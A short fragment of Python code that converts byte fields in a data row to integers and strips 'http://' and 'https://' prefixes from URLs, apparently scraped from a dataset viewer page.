elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url | [
"you@example.com"
] | you@example.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.